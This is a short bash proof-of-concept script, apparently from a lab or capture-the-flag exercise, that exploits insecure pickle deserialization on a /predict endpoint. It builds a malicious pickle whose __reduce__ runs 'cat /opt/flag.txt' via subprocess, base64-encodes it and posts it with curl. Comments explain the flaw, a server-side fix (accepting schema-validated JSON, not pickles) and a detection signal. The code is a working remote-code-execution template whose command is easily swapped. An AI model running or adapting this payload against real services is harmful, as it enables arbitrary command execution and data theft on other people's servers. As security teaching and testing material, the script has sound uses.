#!/usr/bin/env bash
#
# Proof-of-concept for an insecure-deserialization finding on a /predict
# endpoint: it posts a base64-encoded pickle and prints the JSON reply.
#
# Usage:    <script> [BASE_URL]      (BASE_URL defaults to http://127.0.0.1:8080)
# Requires: python, curl and jq on PATH.
#
# What the finding is: unpickling is not data parsing. A pickle stream can
# name any importable callable plus its arguments, and the unpickler calls it.
# NOTE(review): this script only shows the client side; it presumes the
# handler base64-decodes the "data" field and unpickles it. Confirm against
# the server code.
#
# Remediation on the server side: do not unpickle request bodies. Accept a
# plain data format (JSON, validated against a schema) for inputs, and load
# model artifacts only from trusted, integrity-checked storage.
# Detection: the serving process spawning a child process (here `cat`) is the
# observable side effect of this payload.
set -euo pipefail

TARGET="${1:-http://127.0.0.1:8080}"
# Drop a single trailing slash so the joined URL never contains "//predict".
PREDICT="${TARGET%/}/predict"

echo "[exploit] target -> ${TARGET}"

# Build the payload locally. __reduce__ tells pickle how to rebuild the object
# as (callable, args); here that is subprocess.check_output(["cat",
# "/opt/flag.txt"]), so loading the stream runs the command and the "object"
# that comes back is the command's output bytes.
# The heredoc delimiter is quoted, so the shell expands nothing inside it.
b64_payload=$(python - <<'PY'
import base64
import pickle
import subprocess


class R:
    def __reduce__(self):
        # (callable, args) pair the unpickler will invoke on load.
        return (subprocess.check_output, (["cat", "/opt/flag.txt"],))


# Serialise, then base64-encode so the bytes fit inside a JSON string.
print(base64.b64encode(pickle.dumps(R())).decode())
PY
)

# The base64 alphabet has no characters that need JSON escaping, so the value
# can be placed between the quotes as-is.
printf -v json_body '{"data":"%s"}' "${b64_payload}"

echo "[exploit] sending payload to ${PREDICT}"
# With pipefail set, a curl failure or a non-JSON reply (jq parse error)
# aborts the script here.
curl -s -X POST "${PREDICT}" \
  -H "Content-Type: application/json" \
  -d "${json_body}" \
  | jq -C .

echo
echo "[exploit] done. If the server unpickled the payload, it will have executed 'cat /opt/flag.txt' and returned the flag."